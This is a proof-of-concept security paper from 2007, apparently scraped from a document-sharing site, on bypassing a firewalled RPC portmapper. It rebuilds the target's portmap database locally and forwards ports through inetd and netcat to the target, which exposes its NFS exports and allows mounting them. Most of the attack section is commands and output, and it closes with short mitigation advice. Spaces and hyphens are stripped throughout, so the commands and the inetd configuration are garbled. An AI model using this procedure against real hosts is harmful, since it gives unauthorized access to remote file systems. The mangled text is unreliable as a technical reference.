RPC Proxy

BypassRPCportmapperfiltering
securityPoC
(ProofofConcept)
Tableofcontents:
1
Introduction
1.1
Portmapperoverview
2
Firewallingmyportmapper?
2.1
Typicalschemeofattack
3
Localportmapperemulationforremotepenetrationtest
3.1
Whatisneeded?
3.21 Step1:Knowexactlywhatisrunningandwhere
3.22 Step2:Reconstitutionoftheportmapperdatabase
3.23 Step3:ForwardingRPCportstoremotetarget
4
Exploitation
DavidRoutin
david.routin[at]linuxelite.org
1.Introduction
1.1Portmapperoverview
Whatisaportmapper?
PortmapperisakindofdatabasethatregisterRemoteProcedureCall
servicesbyRPCServicesnumbers,versionnumbers,tcp/udpports,andprotocolsthathaveto
beused(tcporudporboths).Portmapperalwaysrunonport111tcp/udp.
Whenclientswantaccesstoaservice,theyfirstcontacttheportmapper,andittellsthem
whichporttheyshouldthencontactinordertoreachthedesiredservice.
Ifportmapperisnotpresentornotaccessibletherequestwillfail.
TheproblemwithRPCistheweaknessofsecurity.
ManysecurityproblemshavebeenrelatedforRPCservices(unauthorizedaccesses,overflows,
spoofingetc...).
2.Firewallingmyportmapper?
2.1Typicalschemeofattack
Someadministratorsthinkthatfilteringportmapper(111tcp/udp)fromtheoutsidekeeptheir
rpcservicesfrombeingexploitedbyunauthorizedpersons.
Thisisfalseandwearegoingtoproveit.
dav@hax:~$nmapsT10.0.0.1
StartingNmap4.11(http://www.insecure.org/nmap/)at20070416
10:00CEST
Interestingportsonknop(10.0.0.1):
Notshown:1674closedports
PORTSTATESERVICE
111/tcpfilteredrpcbind
611/tcpopenmountd
2049/tcpopennfs
Icanseeonthatlistthatrpcbind(portmapper)isfiltered,butthereissomeworkingRPC
services(mountdandnfs)!
Nowwetrytodoashowmounttoviewtheexportsfilelist.
dav@hax:~$showmounte10.0.0.1
mountclntudp_create:RPC:PortmapperfailureRPC:Unableto
receive
Therequestgivesanerrormessage.
Thisisnormalbecausewhentheclientasktheinformationstotheportmapper(itshouldgive
thecorrecttcp/udpportstoconnectto...)forconnectingtomountd(100005)service,theclient
can'tcontinuebecauseRPCportmapperdon'tgiveanyanswer.(whatisnormalbecauseofthe
filtering)
3.Localportmapperemulationforremotepenetrationtest
Weknowthatportmapperisonlyactasadatabasetomaketheclientreach
thedesiredservicesbygivingitthecorrectsportstouseetc...
Butwecan'tconnecttoit...
Afterthinkingforawhileigotanidea,whatwouldhappenifitryto
rebuiltthedatabaseonmyownboxandforwardmylocalportstotheremote
server?
IfoundedawaytodoitwithoutwritinglongCprograms...
3.1
Whatweneed?
nmap
netcat
inetd
portmap(installedonyourcomputer)
pmap_set
3.21
Step1:Knowexactlywhatisrunningandwhere
ForthatstepwewillusenmapwiththeoptionforRPCscan(sR),inthat
waynmapwillgiveustheinformationoneachports,ifitisRPCornotandwhatRPCservice
itis.
WedothatbecauseRPCserviceportsattributionisnotstatic,sometimes
byexamplenfswillnotbeon2049...
WehavetoscanveryhighportsbecauseRPCservicescanregisterveryhighports.
WewilldoitintwotimesfirstTCPfollowedbyUDP.
dav@hax:~$nmapsR10.0.0.1p1115000,2000050000
StartingNmap4.11(http://www.insecure.org/nmap/)at20070416
13:45CEST
PORTSTATESERVICEVERSION
111/tcpfilteredrpcbind
611/tcpopenmountd(mountdV13)13(rpc#100005)
2049/tcpopennfs(nfsV24)24(rpc#100003)
48745/tcpopennlockmgr(nlockmgrV14)14(rpc#100021)
52502/tcpopenstatus(statusV1)1(rpc#100024)
(Secondscan(UDP)requirerootprivileges)
dav@hax:~$sudonmapsUR10.0.0.1p1115000,2000060000
StartingNmap4.11(http://www.insecure.org/nmap/)at2007041613:49
PORTSTATESERVICEVERSION
111/udpfilteredrpcbind
608/udpopenmountd(mountdV13)13(rpc#100005)
631/udpopen|filteredunknown
874/udpopen|filteredunknown
2049/udpopennfs(nfsV24)24(rpc#100003)
32768/udpopen|filteredomad
32780/udpopenstatus(statusV1)1(rpc#100024)
32781/udpopennlockmgr(nlockmgrV14)14(rpc#100021)
3.22
Step2:Reconstitutionoftheportmapperdatabase
Thisstepisveryimportant,wearegoingtomakeafilecontainingalltheportmapdataasif
wehavedonea"rpcinfop"withouthavingbeenfilteredbythefirewall.
Firstcheckalltherpcservices#wegotfromnmap:
100003
100005
100021
100024
Nowwechecktheversion:
for10003wehaveversion2to4fortcpandthesameforudpwithports2049
so,inthefinalportmapdatafileyouwillwrite:
1000032 tcp 2049 nfs
1000033tcp2049nfs
1000034tcp2049nfs
1000032udp2049nfs
1000033udp2049nfs
1000034udp2049nfs
wehavetodothatjobforallRPCservices#wehavefound.
Sothefinalfilewilllooksomethinglikethis:
(don'tforgettoaddthe100000whichistheportmapperregisteringnumber,
youneedittocompletetheexploitationtorunyourlocalportmapversion)
1000002
tcp111portmapper
1000002
udp111portmapper
1000032tcp2049nfs
1000033tcp2049nfs
1000034tcp2049nfs
1000032udp2049nfs
1000033udp2049nfs
1000034udp2049nfs
1000051 tcp
611 mountd
1000052tcp611mountd
1000053tcp611mountd
1000051udp608mountd
1000052udp608mountd
1000053udp608mountd
1000211tcp 48745nlockmgr
1000212tcp48745nlockmgr
1000211udp32781nlockmgr
1000241 tcp
52502
status
1000241 udp
32780
status
Ok,nowwehaveprobablyexactlyrebuilttheportmapdump.(asifwewereauthorizedtodoa
rpcinfoprequestonremotetarget)
Evenifregisteringthesameserviceseveraltimedwithdifferentversionsisnotnecessaryit's
goodtomakeitjusttorebuilttheexactdump.
Nowstartyourlocalcopyofportmap,andloadtheportmapdatayouhavejustcreatedasroot:
root@hax~#portmap
root@hax~#pmap_set<rpc_file_data
root@hax~#
Justhavealookonyourlogstoseethateverythingisok.(nomessages)
Nowifyoudoarpcinfoqueryonyourlocalhostyoushouldhavethesameresultasifyouwere
queryingtheremoteportmapperwithoutanyfilter(wehavereconstructedthedatabasewith
whatwehavefounded).
root@hax~#rpcinfop127.0.0.1
programno_versionprotocoleno_port
1000002tcp111portmapper
1000002udp111portmapper
1000241udp32780status
1000241tcp52502status
1000032udp2049nfs
1000033udp2049nfs
1000034udp2049nfs
1000032tcp2049nfs
1000033tcp2049nfs
1000034tcp2049nfs
1000051udp608mountd
1000051tcp611mountd
1000052udp608mountd
1000052tcp611mountd
1000053udp608mountd
1000053tcp611mountd
3.23
Step3:ForwardinglocalRPCportstoremotetarget
Fordoingthatjobwewillmakesomenetpipeswithinetd&netcat.
First,wegetbackthenmapresultfortcpandudpwecanseethatwehavetcpports(rpc)
opened:
611,2049,48745,52502
andinudp:
608,2049,32780,32781
Nowwearejustgoingtoopenthatportsonourboxandmakethemforwardtotheremote
targetinordertomakealltherequeststoourportmapperandtransparentlyberedirectedto
theremotehost.yesitworks!;)
oknoweditinetdpentestfileandaddthefollowinglines:
fortcpports:
611
2049
48745
52502
stream
stream
stream
stream
tcp
tcp
tcp
tcp
nowforudpports:
608
dgram udp
wait
2049 dgram udp
wait
32780 dgram udp
wait
32781 dgram udp
wait
nowaitroot
nowaitroot
nowaitroot
nowaitroot
root
root
root
root
/usr/sbin/tcpd
/usr/sbin/tcpd
/usr/sbin/tcpd
/usr/sbin/tcpd
/usr/sbin/tcpd
/usr/sbin/tcpd
/usr/sbin/tcpd
/usr/sbin/tcpd
/bin/nc10.0.0.1611
/bin/nc10.0.0.12049
/bin/nc10.0.0.148745
/bin/nc10.0.0.152502
/bin/ncu10.0.0.1608
/bin/ncu10.0.0.12049
/bin/ncu10.0.0.132780
/bin/ncu10.0.0.132781
nowkillandrestartinetd
root@hax~#killallinetd
root@hax~#inetd./inetdpentest
Nowallrequestsmadebyanythingontheportsaddedininetdwillbeforwardedto
theremotehost.
4Exploitation
Withwhatwehavejustdone,allRPCrequests(exceptportmapper)goingthroughourserver
areforwardedtotheremotetarget.
Sample:
wedoashowmountonlocalhost(everythingexcepttheportmapperrequestisforwardedto
10.0.0.1):
root@hax~#showmounte127.0.0.1(USELOCALADRESS)
Exportlistfor127.0.0.1:
/
(everyone)
Theexportslistyoucanseeisnottheoneof127.0.0.1butthisisthe10.0.0.1exportslist.
Youcanalsomounttheremotefilesystem.
AndwecanuseprobablyeveryRPCservicesbythatway.
WehavedonethejoboftheremoteportmapperwithoursystemandnowtheremoteRPC
servicesareaccessible.
Sowewereabletobypasstheremoteportmapperfilteringsecurity.
Thebestwaytoavoidthatproblem:
removeRPCservicesfromyourservers
filterthetcp/udpportsofRPCservicesproperly
useeverythingbehindafirewallorwithaVPN
DavidRoutin
System/Network/SecurityAdministrator
david.routin[at]linuxelite.org

RPC Proxy

Transféré par

Informations du document

Titre original

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

RPC Proxy

Transféré par

Droits d'auteur :

Formats disponibles

BypassRPCportmapperfiltering

Vous aimerez peut-être aussi